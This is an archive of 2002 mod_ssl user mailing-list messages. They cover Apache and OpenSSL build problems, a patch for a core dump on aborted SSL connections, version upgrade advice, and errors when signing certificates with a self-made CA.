	id UAA05142; Thu, 8 Aug 2002 20:26:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sgcmail1.safelite.com id UAA05129; Thu, 8 Aug 2002 20:25:54 +0200 (MET DST)
Received: through eSafe SMTP Relay 1028669463; Thu Aug 08 14:25:59 2002
Received: by sgcmail1.safelite.com with Internet Mail Service (5.5.2650.21)
	id ; Thu, 8 Aug 2002 14:25:35 -0400
Message-ID: 
From: "Xiao, Wei" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 2.039
Date: Thu, 8 Aug 2002 14:25:33 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23F08.FBB9440A"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xiao, Wei" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23F08.FBB9440A
Content-Type: text/plain;
	charset="iso-8859-1"

Thanks. I might put into the wrong directory.
Wei
-----Original Message-----
From: Gregg Andrew [mailto:gandrew@sti.nasa.gov]
Sent: Thursday, August 08, 2002 2:17 PM
To: modssl-users@modssl.org
Subject: RE: Apache 2.039


Did you use just the base directory, default is /usr/local/ssl, this worked
for me.
Gregg Andrew
 
-----Original Message-----
From: Xiao, Wei [mailto:Wei.Xiao@safelite.com] 
Sent: Thursday, August 08, 2002 2:03 PM
To: 'modssl-users@modssl.org'
Subject: RE: Apache 2.039
 
When I run configure --with-ssl=$directory_of_open_ssl, it complained that
it can't find ssl toolkit library. Did I do anything wrong?
Thanks. 
Wei 
-----Original Message----- 
From: Cliff Woolley [

------_=_NextPart_001_01C23F08.FBB9440A
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




RE: Apache 2.039








Thanks. I might put into the wrong directory.

Wei



  
-----Original Message-----
From: Gregg Andrew=20
  [mailto:gandrew@sti.nasa.gov]
Sent: Thursday, August 08, 2002=
 2:17=20
  PM
To: modssl-users@modssl.org
Subject: RE: Apache=20
  2.039


  

  
Did you use =
just the=20
  base directory, default is /usr/local/ssl, this worked for=20
  me.

  
Gregg=20
  Andrew

  
 <=
/o:p>

  
-----Original=20
  Message-----
From: X=
iao, Wei=20
  [mailto:Wei.Xiao@safelite.com] 
Sent: Thursday, August 08, 2002 =
2:03=20
  PM
To:=20
  'modssl-users@modssl.org'
Subject: RE: Apache=20
  2.039

  
 

  
When I run configure=20
  --with-ssl=3D$directory_of_open_ssl, it complained that it can't find s=
sl=20
  toolkit library. Did I do anything wrong?

  
Thanks. 

  
Wei 

  
-----Original Message----- 
=
From: Cliff Woolley=20
  [


------_=_NextPart_001_01C23F08.FBB9440A--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 20:34:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA05412; Thu, 8 Aug 2002 20:33:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id UAA05406; Thu, 8 Aug 2002 20:32:55 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA24188;
	Thu, 8 Aug 2002 14:35:52 -0400
Date: Thu, 8 Aug 2002 14:35:52 -0400 (EDT)
From: "R. DuFresne" 
To: "Xiao, Wei" 
cc: "'modssl-users@modssl.org'" 
Subject: RE: Apache 2.039
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Damn, all this crap to wade through....


Clean DocumentEmail MicrosoftInternetExplorer4 @font-face { font-family:
Tahoma; } @page Section1 {size: 8.5in 11.0in; margin: 1.0in 1.25in 1.0in
1.25in; mso-header-margin: .5in; mso-footer-margin: .5in;
mso-paper-source: 0; } P.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0in 0in
0pt; FONT-FAMILY: "Times New Roman"; mso-style-parent: "";
mso-pagination: widow-orphan; mso-fareast-font-family: "Times New Roman"
} LI.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY:
"Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan;
mso-fareast-font-family: "Times New Roman" } DIV.MsoNormal { FONT-SIZE:
12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY: "Times New Roman";
mso-style-parent: ""; mso-pagination: widow-orphan;
mso-fareast-font-family: "Times New Roman" } A:link { COLOR: blue;
TEXT-DECORATION: underline; text-underline: single } SPAN.MsoHyperlink {
COLOR: blue; TEXT-DECORATION: underline; text-underline: single }
A:visited { COLOR: purple; TEXT-DECORATION: underline; text-underline:
single } SPAN.MsoHyperlinkFollowed { COLOR: purple; TEXT-DECORATION:
underline; text-underline: single } P { FONT-SIZE: 12pt; MARGIN-LEFT:
0in; MARGIN-RIGHT: 0in; FONT-FAMILY: "Times New Roman"; mso-pagination:
widow-orphan; mso-fareast-font-family: "Times New Roman";
mso-margin-top-alt: auto; mso-margin-bottom-alt: auto } SPAN.EmailStyle18
...

just to see this:

Thanks. I might put into the wrong directory.


Damned html mail clients...


Thanks,

Ron DuFresne

On Thu, 8 Aug 2002, Xiao, Wei wrote:

> Thanks. I might put into the wrong directory.
> Wei
> -----Original Message-----
> From: Gregg Andrew [mailto:gandrew@sti.nasa.gov]
> Sent: Thursday, August 08, 2002 2:17 PM
> To: modssl-users@modssl.org
> Subject: RE: Apache 2.039
> 
> 
> Did you use just the base directory, default is /usr/local/ssl, this worked
> for me.
> Gregg Andrew
>  
> -----Original Message-----
> From: Xiao, Wei [mailto:Wei.Xiao@safelite.com] 
> Sent: Thursday, August 08, 2002 2:03 PM
> To: 'modssl-users@modssl.org'
> Subject: RE: Apache 2.039
>  
> When I run configure --with-ssl=$directory_of_open_ssl, it complained that
> it can't find ssl toolkit library. Did I do anything wrong?
> Thanks. 
> Wei 
> -----Original Message----- 
> From: Cliff Woolley [
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 02:18:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA13906; Fri, 9 Aug 2002 02:17:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from atlrel6.hp.com id CAA13902; Fri, 9 Aug 2002 02:17:02 +0200 (MET DST)
Received: from xatlrelay1.atl.hp.com (xatlrelay1.atl.hp.com [15.45.89.190])
	by atlrel6.hp.com (Postfix) with ESMTP
	id 19E89A0A; Thu,  8 Aug 2002 20:16:59 -0400 (EDT)
Received: from xatlbh4.atl.hp.com (xatlbh4.atl.hp.com [15.45.89.189])
	by xatlrelay1.atl.hp.com (Postfix) with ESMTP
	id 7C49914B; Thu,  8 Aug 2002 20:16:58 -0400 (EDT)
Received: by xatlbh4.atl.hp.com with Internet Mail Service (5.5.2655.55)
	id ; Thu, 8 Aug 2002 20:16:58 -0400
Message-ID: 
From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
To: "'rse@engelschall.com'" ,
        "'modssl-users@modssl.org'" 
Cc: "'dev@httpd.apache.org'" 
Subject: RE: Apache 1.3.26 + mod_ssl 2.8.10 dumps core
Date: Thu, 8 Aug 2002 20:16:49 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sorry for this blast-o-gram. I realized that the patch that I'd posted was
totally a wrong one - and did not achieve what it was meant for :-(.
For those interested, here's something which is pretty close to what I'd
intented).

Thanks
-Madhu

diff -ru mod_ssl-2.8.10-1.3.26/pkg.sslmod/ssl_engine_io.c
apache_1.3.26/src/modules/ssl/ssl_engine_io.c
--- mod_ssl-2.8.10-1.3.26/pkg.sslmod/ssl_engine_io.c    Fri Aug  2 13:44:24
2002
+++ apache_1.3.26/src/modules/ssl/ssl_engine_io.c       Thu Aug  8 16:38:09
2002
@@ -346,6 +346,14 @@

     if ((ssl = ap_ctx_get(fb->ctx, "ssl")) != NULL) {
         rc = SSL_read(ssl, buf, len);
+
+        c = (conn_rec *)SSL_get_app_data(ssl);
+        if (c->aborted) {
+            ssl->rwstate = SSL_NOTHING;
+            ssl_hook_CloseConnection(c);
+            return -1;
+        }
+
         /*
          * Simulate an EINTR in case OpenSSL wants to read more.
          * (This is usually the case when the client forces an SSL
@@ -380,6 +388,14 @@

     if ((ssl = ap_ctx_get(fb->ctx, "ssl")) != NULL) {
         rc = SSL_write(ssl, buf, len);
+
+        c = (conn_rec *)SSL_get_app_data(ssl);
+        if (c->aborted) {
+            ssl->rwstate = SSL_NOTHING;
+            ssl_hook_CloseConnection(c);
+            return -1;
+        }
+
         /*
          * Simulate an EINTR in case OpenSSL wants to write more.
          */
diff -ru mod_ssl-2.8.10-1.3.26/pkg.sslmod/ssl_engine_kernel.c
apache_1.3.26/src/
modules/ssl/ssl_engine_kernel.c
--- mod_ssl-2.8.10-1.3.26/pkg.sslmod/ssl_engine_kernel.c        Fri Aug  2
13:44
:24 2002
+++ apache_1.3.26/src/modules/ssl/ssl_engine_kernel.c   Thu Aug  8 16:19:31
2002
@@ -457,6 +457,9 @@
     if (ssl == NULL)
         return;

+    if (SSL_want_read(ssl) || SSL_want_write(ssl))
+        return;
+
     /*
      * First make sure that no more data is pending in Apache's BUFF,
      * because when it's (implicitly) flushed later by the ap_bclose()


----------------------------------------------------------------------------
---


-----Original Message-----
From: MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)
[mailto:madhusudan_mathihalli@hp.com]
Sent: Sunday, August 04, 2002 10:08 AM
To: 'dev@httpd.apache.org'
Cc: 'modssl-users@modssl.org'
Subject: [PATCH - Apache 1.3] Apache 1.3.26 + mod_ssl 2.8.10 dumps core


Hi,
	I'm not sure whom to approach for this problem - so I'm sending it
to both the mailing lists. Here's a pretty easy way to reproduce the SEGV
that I'm experiencing (on HP-UX 11.0 / 11i)

1. Download OpenSSL 0.9.6e, Apache 1.3.26 and mod_ssl 2.8.10
2. Build and install Apache (ofcourse with mod_ssl capability)
3. Set the Timeout to 20 secs (pl. note it's the hard timeout and not the
keepalive / SSLSessionCacheTimeout)
4. Create a simple HTML file (/opt/apache/htdocs/a.html) as follows :
   -----------------------------------------------
   
   side_menu.htm
   
    

    
pdf-test

   
   
   ------------------------------------------------
5. And ofcourse, create /opt/apache/htdocs/10mb.pdf file.
6. Start Apache with SSL capability, and access the URL
https://servername/a.html (Client browser was Win2K box/IE 5.5).
7. Right click on "pdf-test", and select the "Save as" tab. This should
bring up the "Save As" dialog box.
8. Don't do any thing - and you'll see a SEGV in /opt/apache/logs/error_log
after about 20 secs.

Now, is this the expected behavior? I don't believe so. A closer
investigation seemed that mod_SSL had nothing to do with the core dump. It's
the way a aborted connection was handled.

The following patch seemed to resolve the core dump issue for me - but I
don't believe it's the correct fix. Can somebody please evaluate the patch
and let me know if it's okay? Also, I've not evaluated the side-effects of
doing such a thing.
[I don't know what's the difference b/w hard timeout and soft timeout - in
the sense where/how should it be used. It'd be great if somebody could
explain the difference]

Thanks
-Madhu

$ cvs diff http_protocol.c
Index: http_protocol.c
===================================================================
RCS file: /home/cvspublic/apache-1.3/src/main/http_protocol.c,v
retrieving revision 1.325
diff -u -r1.325 http_protocol.c
--- http_protocol.c     9 Jul 2002 15:26:26 -0000       1.325
+++ http_protocol.c     4 Aug 2002 16:54:45 -0000
@@ -2362,7 +2362,7 @@
     if (length == 0)
         return 0;

-    ap_soft_timeout("send body", r);
+    ap_hard_timeout("send body", r);

     while (!r->connection->aborted) {
         if ((length > 0) && (total_bytes_sent + IOBUFSIZE) > length)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 03:41:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA15420; Fri, 9 Aug 2002 03:40:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id DAA15410; Fri, 9 Aug 2002 03:39:14 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c51line128.dialup2.ctm.net [202.175.35.129])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id JAA08114
	for ; Fri, 9 Aug 2002 09:22:12 +0800
Message-ID: <3D531D2C.CEBC37D8@ita.org.mo>
Date: Fri, 09 Aug 2002 09:38:52 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
References: <55DDBD7541A9894B9F695868B6DFFEED0355E4@exchange.w2k.casi.sti.nasa.gov>
Content-Type: multipart/alternative;
 boundary="------------2C773CF2DBE7A8749C48399D"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------2C773CF2DBE7A8749C48399D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Gregg Andrew wrote:

> Openssl.org version 0.9.6e
>

Do you know what different between 0.9.6b and 0.9.6e, Because I knew
there are some of users they are using 0.9.6b, I think 0.9.6b is an
older version... But if I use the new version of Apache ( eg : 1.3.26 ),
so... use 0.9.6e is good ? I was fail to install 0.9.6d !

--------------2C773CF2DBE7A8749C48399D
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




Gregg Andrew wrote:





Openssl.org
version 0.9.6e








Do you know what different between 0.9.6b and 0.9.6e, Because I
knew there are some of users they are using 0.9.6b, I think 0.9.6b is an
older version... But if I use the new version of Apache ( eg : 1.3.26 ),
so... use 0.9.6e is good ? I was fail to install 0.9.6d !



--------------2C773CF2DBE7A8749C48399D--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 04:31:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA16605; Fri, 9 Aug 2002 04:30:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id EAA16544; Fri, 9 Aug 2002 04:29:40 +0200 (MET DST)
Received: from node11.unix.virginia.edu by mail.virginia.edu id aa20255;
          8 Aug 2002 22:29 EDT
Received: from localhost (jcw5q@localhost)
	by node11.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id WAA59824
	for ; Thu, 8 Aug 2002 22:29:38 -0400
X-Authentication-Warning: node11.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Thu, 8 Aug 2002 22:29:37 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: Apache 2.039
In-Reply-To: <3D531D2C.CEBC37D8@ita.org.mo>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 9 Aug 2002 EdwardSPL@ita.org.mo wrote:

> Do you know what different between 0.9.6b and 0.9.6e

Among other things, there are important security fixes in 0.9.6e (for
remotely exploitable bugs in 0.9.6d and earlier versions).

Upgrade to 0.9.6e.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 04:59:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA16952; Fri, 9 Aug 2002 04:58:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id EAA16939; Fri, 9 Aug 2002 04:57:35 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c51line128.dialup2.ctm.net [202.175.35.129])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id KAA08257
	for ; Fri, 9 Aug 2002 10:40:34 +0800
Message-ID: <3D532F8B.B0D33A72@ita.org.mo>
Date: Fri, 09 Aug 2002 10:57:15 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Cliff Woolley wrote:

> On Fri, 9 Aug 2002 EdwardSPL@ita.org.mo wrote:
>
> > Do you know what different between 0.9.6b and 0.9.6e
>
> Among other things, there are important security fixes in 0.9.6e (for
> remotely exploitable bugs in 0.9.6d and earlier versions).
>
> Upgrade to 0.9.6e.

So, do you agree compile and install apache 1.3.26, php 4.2.2, MySQL
3.23.51, OpenSSL 0.9.6e and mod_ssl 2.8.10-1.3.26 good for working
together under Linux / Unix / other OS System ?

Thank for your help !


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 09:46:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA24206; Fri, 9 Aug 2002 09:45:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA24135; Fri, 9 Aug 2002 09:44:18 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0E48D4CE76A; Fri,  9 Aug 2002 09:44:16 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 74D38285D1; Fri,  9 Aug 2002 09:43:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from usilms54.ca.com id DAA15236; Fri, 9 Aug 2002 03:20:38 +0200 (MET DST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23F42.F43969F0"
Subject: x.509 on Apache
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Thu, 8 Aug 2002 21:20:31 -0400
Message-ID: <849C1D32E4C7924F854D8A0356C72A9E063DB3E5@usilms08.ca.com>
Thread-Topic: Apache 2.039
Thread-Index: AcI/Bk6UOLvrhJK5TaahA9mD5rcpNQAO392w
From: "Bao, Xiliang" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bao, Xiliang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C23F42.F43969F0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi:
=20
I am try to config Apache 1.3.26 with SSL. I create a certificate and =
Apache server runs.
But when I try visit the website from windows browser (IE5.x or Netscape =
6.x), it can not
visit the website. I have referenced some document, but none of really =
solve the problem.
Any one has good document or instruction for that?
=20
Steve=20

------_=_NextPart_001_01C23F42.F43969F0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




RE: Apache 2.039




Hi:


 


I am=20
try to config Apache 1.3.26 with SSL. I create a certificate and Apache =
server=20
runs.


But=20
when I try visit the website from windows browser (IE5.x or Netscape =
6.x), it=20
can not


visit=20
the website. I have referenced some document, but none of really solve =
the=20
problem.


Any=20
one has good document or instruction for that?


 


Steve 


------_=_NextPart_001_01C23F42.F43969F0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 12:39:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA03281; Fri, 9 Aug 2002 12:38:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from m7.limsi.fr id MAA03255; Fri, 9 Aug 2002 12:37:28 +0200 (MET DST)
Received: from free.fr (corot-1.limsi.fr [192.44.78.59])
          by m7.limsi.fr (8.9.3/jtpda-5.3.1) with ESMTP id MAA08483
          for ; Fri, 9 Aug 2002 12:38:35 +0200 (MET DST)
Message-ID: <3D539AC8.BE47D970@free.fr>
Date: Fri, 09 Aug 2002 12:34:48 +0200
From: Philippe Marsalle 
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.17 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: error while signing the csr
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Philippe Marsalle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi ,

I want to create a ssl server certificate for an intranet server (apache
1.3.14).
I carefully follow the instruction of the documentation which comes with
mod-ssl :
I created a private key for the server:
# openssl genrsa -des3 -out server key 1024
I created a csr with the previous generated key
# openssl req -new -key server.key -out server.csr

As it is for an intranet server, I decided to use my own certificate
authority ,
I first created a private key for the ca :
# openssl genrsa -des3 -out ca.key 1024
I created a self signed certificate with this key :
# openssl req -new -x509 -days 365 -key ca.key -out ca.crt
Then I used the sign.sh script :
# ./sign.sh server.csr

Everything 's all right untill he asks me to commit :

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
CA verifying: server.crt <-> CA cert
server.crt:
[....]
error 18 at 0 depth lookup:self signed certificate
[...]
error 7 at 0 depth lookup:certificate signature failure

Did I do sth wrong ? what's the meaning of these two errors message?
Thanks for your help :)

--
Philippe,
      pmars@free.fr



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 12:44:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA03539; Fri, 9 Aug 2002 12:43:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id MAA03531; Fri, 9 Aug 2002 12:42:27 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c38line117.dialup.ctm.net [202.175.53.118])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id SAA08862
	for ; Fri, 9 Aug 2002 18:25:25 +0800
Message-ID: <3D539C7D.9BCE6FCC@ita.org.mo>
Date: Fri, 09 Aug 2002 18:42:05 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: x.509 on Apache
References: <849C1D32E4C7924F854D8A0356C72A9E063DB3E5@usilms08.ca.com>
Content-Type: multipart/alternative;
 boundary="------------5AC49AFA4E940738CCF1C3E1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------5AC49AFA4E940738CCF1C3E1
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Are using OpenSSL 0.9.6d ?
If, so...Please upgrade to OpenSSL 0.9.6e, then I think you can visit
the website by using https protocol !

"Bao, Xiliang" wrote:

>  Hi:I am try to config Apache 1.3.26 with SSL. I create a certificate
> and Apache server runs.But when I try visit the website from windows
> browser (IE5.x or Netscape 6.x), it can notvisit the website. I have
> referenced some document, but none of really solve the problem.Any one
> has good document or instruction for that?Steve

--------------5AC49AFA4E940738CCF1C3E1
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit



Are using OpenSSL 0.9.6d ?

If, so...Please upgrade to OpenSSL 0.9.6e, then I think you can visit
the website by using https protocol !

"Bao, Xiliang" wrote:

 Hi:I
am try to config Apache 1.3.26 with SSL. I create a certificate and Apache
server runs.But
when I try visit the website from windows browser (IE5.x or Netscape 6.x),
it can notvisit
the website. I have referenced some document, but none of really solve
the problem.Any
one has good document or instruction for that?Steve



--------------5AC49AFA4E940738CCF1C3E1--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 13:03:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA04472; Fri, 9 Aug 2002 13:02:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id NAA04468; Fri, 9 Aug 2002 13:01:39 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c38line117.dialup.ctm.net [202.175.53.118])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id SAA08922
	for ; Fri, 9 Aug 2002 18:44:38 +0800
Message-ID: <3D53A100.D81B659A@ita.org.mo>
Date: Fri, 09 Aug 2002 19:01:20 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: error while signing the csr
References: <3D539AC8.BE47D970@free.fr>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Many users they recommend to use apache 1.3.26 and OpenSSL 0.9.6d ( I
suggest to use 0.9.6e, because I was fail to compile and install 0.9.6d, but
I want to know is it a bug about apache 1.3.26 and OpenSSL 0.9.6d really
from other user ) !

Edward.

Philippe Marsalle wrote:

> Hi ,
>
> I want to create a ssl server certificate for an intranet server (apache
> 1.3.14).
> I carefully follow the instruction of the documentation which comes with
> mod-ssl :
> I created a private key for the server:
> # openssl genrsa -des3 -out server key 1024
> I created a csr with the previous generated key
> # openssl req -new -key server.key -out server.csr
>
> As it is for an intranet server, I decided to use my own certificate
> authority ,
> I first created a private key for the ca :
> # openssl genrsa -des3 -out ca.key 1024
> I created a self signed certificate with this key :
> # openssl req -new -x509 -days 365 -key ca.key -out ca.crt
> Then I used the sign.sh script :
> # ./sign.sh server.csr
>
> Everything 's all right untill he asks me to commit :
>
> 1 out of 1 certificate requests certified, commit? [y/n]y
> Write out database with 1 new entries
> Data Base Updated
> CA verifying: server.crt <-> CA cert
> server.crt:
> [....]
> error 18 at 0 depth lookup:self signed certificate
> [...]
> error 7 at 0 depth lookup:certificate signature failure
>
> Did I do sth wrong ? what's the meaning of these two errors message?
> Thanks for your help :)


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 13:14:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA05201; Fri, 9 Aug 2002 13:13:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.dev.datalogica.com id NAA05197; Fri, 9 Aug 2002 13:13:01 +0200 (MET DST)
Received: from localhost (localhost [[UNIX: localhost]])
	by iris.dev.datalogica.com (8.11.6/8.11.6) id g79BDVO17718
	for modssl-users@modssl.org; Fri, 9 Aug 2002 11:13:31 GMT
Content-Type: text/plain;
